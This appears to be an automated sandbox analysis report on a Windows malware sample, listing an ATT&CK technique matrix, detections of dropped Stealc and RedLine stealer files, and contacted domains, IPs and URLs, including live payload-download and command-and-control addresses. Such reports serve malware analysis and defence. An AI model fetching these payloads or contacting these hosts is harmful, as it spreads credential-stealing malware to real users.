Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	211 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	269 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	431 Security Software Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	341 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	341 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TNQTc6Qmkg.exe	47%	ReversingLabs	Win32.Trojan.Generic
TNQTc6Qmkg.exe	44%	Virustotal		Browse
TNQTc6Qmkg.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\osssciedmed	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\osssciedmed	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\u3bs.0.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	72%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	47%	ReversingLabs	Win32.Spyware.Stealc
C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exe	72%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\bxhlahunbhc	61%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\osssciedmed	65%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\osssciedmed	61%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u3bs.0.exe	39%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u3bs.2\UIxMarketPlugin.dll	13%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u3bs.2\relay.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u3bs.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u3bs.3.exe	3%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
note.padd.cn.com	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://www.indyproject.org/	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.228/ping.php?substr=eight	100%	Avira URL Cloud	malware
http://185.172.128.228/BroomSetup.exe	23%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/sqlite3.dll#	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Virustotal		Browse
185.172.128.76/3cd2b41cbde8fc9c.php	16%	Virustotal		Browse
http://185.172.128.228/ping.php?substr=eight	18%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/msvcp140.dllQ	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe	20%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll#	9%	Virustotal		Browse
http://185.172.128.203/tiktok.exe00	15%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/sqlite3.dll	9%	Virustotal		Browse
http://note.padd.cn.com/1/Package.zip	3%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.php	16%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/freebl3.dllc	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dllr	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bf	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dllQ	7%	Virustotal		Browse
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.	0%	Avira URL Cloud	safe
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/vcruntime140.dll)	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/freebl3.dll	0%	Avira URL Cloud	safe
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	3%	Virustotal		Browse
http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0	100%	Avira URL Cloud	malware
http://185.172.128.59/syncUpd.exe	23%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/freebl3.dll	0%	Virustotal		Browse
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exet-Disposition:	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/vcruntime140.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe&	0%	Avira URL Cloud	safe
http://download.iolo.net	0%	Avira URL Cloud	safe
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.	0%	Virustotal		Browse
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Virustotal		Browse
http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0	21%	Virustotal		Browse
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe	1%	Virustotal		Browse
http://185.172.128.203/tiktok.exet-Disposition:	15%	Virustotal		Browse
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/vcruntime140.dll:	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/nss3.dllb	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/vcruntime140.dll	0%	Virustotal		Browse
http://185.172.128.76	14%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dllb	3%	Virustotal		Browse
http://download.iolo.net	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.251.32.100	true	false		high
iolo0.b-cdn.net	169.150.236.99	true	false		high
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse	unknown
svc.iolo.com	20.157.87.45	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.228/BroomSetup.exe	false	23%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/v2/track	false		high
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
185.172.128.76/3cd2b41cbde8fc9c.php	true	16%, Virustotal, Browse Avira URL Cloud: safe	low
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.228/ping.php?substr=eight	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://note.padd.cn.com/1/Package.zip	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_promos	false		high
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.google.com/async/ddljson?async=ntp:2	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/vcruntime140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u3bs.3.exe, 00000011.00000002.2974514605.0000000002686000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026E2000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtabS	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	false		high
http://185.172.128.203/tiktok.exe00	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll#	u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	false		high
http://185.172.128.76/15f649199f40275b/msvcp140.dllQ	u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
https://pastebin.com/raw/z9pYkqPQPOdq8	MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 0000000C.00000002.2979656703.00000000027B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sqlite.org/copyright.html.	u3bs.0.exe, 00000001.00000002.2999981368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u3bs.0.exe, u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr	false		high
https://mozilla.org0/	nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/freebl3.dllc	u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/nss3.dllr	u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.dr	false	URL Reputation: safe	unknown
http://www.vmware.com/0/	run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
